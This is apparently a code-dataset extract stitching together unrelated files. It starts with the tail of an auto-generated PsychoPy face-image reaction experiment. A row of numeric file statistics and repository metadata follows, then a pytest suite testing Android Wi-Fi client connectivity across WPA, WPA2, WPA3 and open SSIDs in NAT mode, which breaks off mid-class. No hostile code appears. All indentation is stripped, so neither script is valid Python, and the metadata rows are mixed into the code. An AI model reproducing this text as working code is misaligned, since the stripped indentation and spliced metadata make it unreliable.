thisLoop_face2 = loop_face2.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisLoop_face2.rgb)
if thisLoop_face2 != None:
for paramName in thisLoop_face2:
exec('{} = thisLoop_face2[paramName]'.format(paramName))
for thisLoop_face2 in loop_face2:
currentLoop = loop_face2
# abbreviate parameter names if possible (e.g. rgb = thisLoop_face2.rgb)
if thisLoop_face2 != None:
for paramName in thisLoop_face2:
exec('{} = thisLoop_face2[paramName]'.format(paramName))
# ------Prepare to start Routine "face"-------
continueRoutine = True
routineTimer.add(2.400000)
# update component parameters for each repeat
image_2.setImage(path2)
key_resp_face.keys = []
key_resp_face.rt = []
_key_resp_face_allKeys = []
# keep track of which components have finished
faceComponents = [concentration2, image_2, key_resp_face]
for thisComponent in faceComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
faceClock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "face"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = faceClock.getTime()
tThisFlip = win.getFutureFlipTime(clock=faceClock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *concentration2* updates
if concentration2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
concentration2.frameNStart = frameN # exact frame index
concentration2.tStart = t # local t and not account for scr refresh
concentration2.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(concentration2, 'tStartRefresh') # time at next scr refresh
concentration2.setAutoDraw(True)
if concentration2.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > concentration2.tStartRefresh + 0.4-frameTolerance:
# keep track of stop time/frame for later
concentration2.tStop = t # not accounting for scr refresh
concentration2.frameNStop = frameN # exact frame index
win.timeOnFlip(concentration2, 'tStopRefresh') # time at next scr refresh
concentration2.setAutoDraw(False)
# *image_2* updates
if image_2.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
# keep track of start time/frame for later
image_2.frameNStart = frameN # exact frame index
image_2.tStart = t # local t and not account for scr refresh
image_2.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(image_2, 'tStartRefresh') # time at next scr refresh
image_2.setAutoDraw(True)
if image_2.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > image_2.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
image_2.tStop = t # not accounting for scr refresh
image_2.frameNStop = frameN # exact frame index
win.timeOnFlip(image_2, 'tStopRefresh') # time at next scr refresh
image_2.setAutoDraw(False)
# *key_resp_face* updates
waitOnFlip = False
if key_resp_face.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
# keep track of start time/frame for later
key_resp_face.frameNStart = frameN # exact frame index
key_resp_face.tStart = t # local t and not account for scr refresh
key_resp_face.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_face, 'tStartRefresh') # time at next scr refresh
key_resp_face.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_face.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_face.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_face.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > key_resp_face.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
key_resp_face.tStop = t # not accounting for scr refresh
key_resp_face.frameNStop = frameN # exact frame index
win.timeOnFlip(key_resp_face, 'tStopRefresh') # time at next scr refresh
key_resp_face.status = FINISHED
if key_resp_face.status == STARTED and not waitOnFlip:
theseKeys = key_resp_face.getKeys(keyList=['space'], waitRelease=False)
_key_resp_face_allKeys.extend(theseKeys)
if len(_key_resp_face_allKeys):
key_resp_face.keys = _key_resp_face_allKeys[-1].name # just the last key pressed
key_resp_face.rt = _key_resp_face_allKeys[-1].rt
# was this correct?
if (key_resp_face.keys == str(path2_corr)) or (key_resp_face.keys == path2_corr):
key_resp_face.corr = 1
else:
key_resp_face.corr = 0
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in faceComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "face"-------
for thisComponent in faceComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
loop_face2.addData('concentration2.started', concentration2.tStartRefresh)
loop_face2.addData('concentration2.stopped', concentration2.tStopRefresh)
loop_face2.addData('image_2.started', image_2.tStartRefresh)
loop_face2.addData('image_2.stopped', image_2.tStopRefresh)
# check responses
if key_resp_face.keys in ['', [], None]: # No response was made
key_resp_face.keys = None
# was no response the correct answer?!
if str(path2_corr).lower() == 'none':
key_resp_face.corr = 1; # correct non-response
else:
key_resp_face.corr = 0; # failed to respond (incorrectly)
# store data for loop_face2 (TrialHandler)
loop_face2.addData('key_resp_face.keys',key_resp_face.keys)
loop_face2.addData('key_resp_face.corr', key_resp_face.corr)
if key_resp_face.keys != None: # we had a response
loop_face2.addData('key_resp_face.rt', key_resp_face.rt)
loop_face2.addData('key_resp_face.started', key_resp_face.tStartRefresh)
loop_face2.addData('key_resp_face.stopped', key_resp_face.tStopRefresh)
thisExp.nextEntry()
# completed 2 repeats of 'loop_face2'
# ------Prepare to start Routine "thanks"-------
continueRoutine = True
routineTimer.add(2.000000)
# update component parameters for each repeat
# keep track of which components have finished
thanksComponents = [text]
for thisComponent in thanksComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
thanksClock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "thanks"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = thanksClock.getTime()
tThisFlip = win.getFutureFlipTime(clock=thanksClock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *text* updates
if text.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
text.frameNStart = frameN # exact frame index
text.tStart = t # local t and not account for scr refresh
text.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(text, 'tStartRefresh') # time at next scr refresh
text.setAutoDraw(True)
if text.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > text.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
text.tStop = t # not accounting for scr refresh
text.frameNStop = frameN # exact frame index
win.timeOnFlip(text, 'tStopRefresh') # time at next scr refresh
text.setAutoDraw(False)
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in thanksComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "thanks"-------
for thisComponent in thanksComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('text.started', text.tStartRefresh)
thisExp.addData('text.stopped', text.tStopRefresh)
# Flip one final time so any remaining win.callOnFlip()
# and win.timeOnFlip() tasks get executed before quitting
win.flip()
# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort() # or data files will save again on exit
win.close()
core.quit()
| 47.29494 | 113 | 0.661979 | 8,582 | 71,037 | 5.357842 | 0.064437 | 0.048716 | 0.024532 | 0.020661 | 0.872534 | 0.859746 | 0.821752 | 0.781671 | 0.751397 | 0.740915 | 0 | 0.017818 | 0.25101 | 71,037 | 1,501 | 114 | 47.326449 | 0.846371 | 0.275223 | 0 | 0.691806 | 0 | 0.003724 | 0.067038 | 0.025073 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.013966 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
de9f6a0fc1195d27353cc03aa58ff5735b9edee9 | 27,066 | py | Python | tests/e2e/interOp/validation_of_operating_modes/nat_mode/client_connectivity_test/android/test_general_security_modes.py | dutta-rohan/wlan-testing | 77264245b62e21dff5f38c7eae74c22e0cdeefbb | [
"BSD-3-Clause"
] | 7 | 2020-08-19T16:45:46.000Z | 2022-02-10T09:55:22.000Z | tests/e2e/interOp/validation_of_operating_modes/nat_mode/client_connectivity_test/android/test_general_security_modes.py | dutta-rohan/wlan-testing | 77264245b62e21dff5f38c7eae74c22e0cdeefbb | [
"BSD-3-Clause"
] | 47 | 2020-12-20T16:06:03.000Z | 2022-03-23T03:01:22.000Z | tests/e2e/interOp/validation_of_operating_modes/nat_mode/client_connectivity_test/android/test_general_security_modes.py | dutta-rohan/wlan-testing | 77264245b62e21dff5f38c7eae74c22e0cdeefbb | [
"BSD-3-Clause"
] | 9 | 2021-02-04T22:32:06.000Z | 2021-12-14T17:45:51.000Z | from logging import exception
import unittest
import warnings
from perfecto.test import TestResultFactory
import pytest
import sys
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from appium import webdriver
from selenium.common.exceptions import NoSuchElementException
import sys
import allure
if 'perfecto_libs' not in sys.path:
sys.path.append(f'../libs/perfecto_libs')
pytestmark = [pytest.mark.sanity, pytest.mark.interop, pytest.mark.android, pytest.mark.interop_and, pytest.mark.client_connectivity
,pytest.mark.interop_uc_sanity, pytest.mark.nat]
from android_lib import closeApp, set_APconnMobileDevice_android, Toggle_AirplaneMode_android, ForgetWifiConnection, openApp, \
get_ip_address_and, verifyUploadDownloadSpeed_android, wifi_connect, wifi_disconnect_and_forget
setup_params_general = {
"mode": "NAT",
"ssid_modes": {
"wpa": [{"ssid_name": "ssid_wpa_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa_5g", "appliedRadios": ["5G"],
"security_key": "something"}],
"open": [{"ssid_name": "ssid_open_2g", "appliedRadios": ["2G"]},
{"ssid_name": "ssid_open_5g", "appliedRadios": ["5G"]}],
"wpa2_personal": [
{"ssid_name": "ssid_wpa2_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa2_5g", "appliedRadios": ["5G"],
"security_key": "something"}]},
"rf": {},
"radius": False
}
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="NAT Mode Client Connectivity : Suite-A")
@pytest.mark.InteropsuiteA
@allure.feature("NAT MODE CLIENT CONNECTIVITY")
@pytest.mark.parametrize(
'setup_profiles',
[setup_params_general],
indirect=True,
scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestNatModeConnectivitySuiteOne(object):
""" Client Connect SuiteA
pytest -m "client_connectivity and nat and InteropsuiteA"
"""
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4536", name="WIFI-4536")
@pytest.mark.fiveg
@pytest.mark.wpa2_personal
def test_ClientConnectivity_5g_WPA2_Personal_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print("SSID_NAME: " + ssidName)
print("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4535", name="WIFI-4535")
@pytest.mark.twog
@pytest.mark.wpa2_personal
def test_ClientConnectivity_2g_WPA2_Personal_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4534", name="WIFI-4534")
@pytest.mark.fiveg
@pytest.mark.wpa
def test_ClientConnectivity_5g_WPA_Personal_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4533", name="WIFI-4533")
@pytest.mark.twog
@pytest.mark.wpa
def test_ClientConnectivity_2g_WPA_Personal_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4531", name="WIFI-4531")
@pytest.mark.fiveg
@pytest.mark.open
def test_ClientConnectivity_5g_Open_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["open"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = "[BLANK]"
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4530", name="WIFI-4530")
@pytest.mark.twog
@pytest.mark.open
def test_ClientConnectivity_2g_Open_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["open"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = "[BLANK]"
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
setup_params_general_two = {
"mode": "NAT",
"ssid_modes": {
"wpa3_personal": [
{"ssid_name": "ssid_wpa3_p_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa3_p_5g", "appliedRadios": ["5G"],
"security_key": "something"}],
"wpa3_personal_mixed": [
{"ssid_name": "ssid_wpa3_p_m_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa3_p_m_5g", "appliedRadios": ["5G"],
"security_key": "something"}],
"wpa_wpa2_personal_mixed": [
{"ssid_name": "ssid_wpa_wpa2_p_m_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa_wpa2_p_m_5g", "appliedRadios": ["5G"],
"security_key": "something"}]
},
"rf": {},
"radius": False
}
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="Bridge Mode Client Connectivity : Suite-B")
@pytest.mark.InteropsuiteB
@allure.feature("NAT MODE CLIENT CONNECTIVITY")
@pytest.mark.parametrize(
'setup_profiles',
[setup_params_general_two],
indirect=True,
scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestNatModeConnectivitySuiteTwo(object):
""" Client Connectivity SuiteB
pytest -m "client_connectivity and nat and InteropsuiteB"
"""
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4539", name="WIFI-4539")
@pytest.mark.wpa3_personal
@pytest.mark.twog
@allure.story('open 2.4 GHZ Band')
def test_wpa3_personal_2g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4540", name="WIFI-4540")
@pytest.mark.wpa3_personal
@pytest.mark.fiveg
@allure.story('open 5 GHZ Band')
def test_wpa3_personal_5g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4541", name="WIFI-4541")
@pytest.mark.wpa3_personal_mixed
@pytest.mark.twog
@allure.story('open 2.4 GHZ Band')
def test_wpa3_personal_mixed_2g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal_mixed"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4542", name="WIFI-4542")
@pytest.mark.wpa3_personal_mixed
@pytest.mark.fiveg
@allure.story('open 5 GHZ Band')
def test_wpa3_personal_mixed_5g(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal_mixed"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4543", name="WIFI-4543")
@pytest.mark.wpa_wpa2_personal_mixed
@pytest.mark.twog
@allure.story('wpa wpa2 personal mixed 2.4 GHZ Band')
def test_wpa_wpa2_personal_2g_Nat(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa_wpa2_personal_mixed"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
#
if is_internet:
if ip:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + "with Internet, couldn't get IP address")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
wifi_connect(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
assert verifyUploadDownloadSpeed_android(request, setup_perfectoMobile_android, connData)
wifi_disconnect_and_forget(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
else:
allure.attach(name="Connection Status: ", body=str("No Internet access"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4544", name="WIFI-4544")
@pytest.mark.wpa_wpa2_personal_mixed
@pytest.mark.fiveg
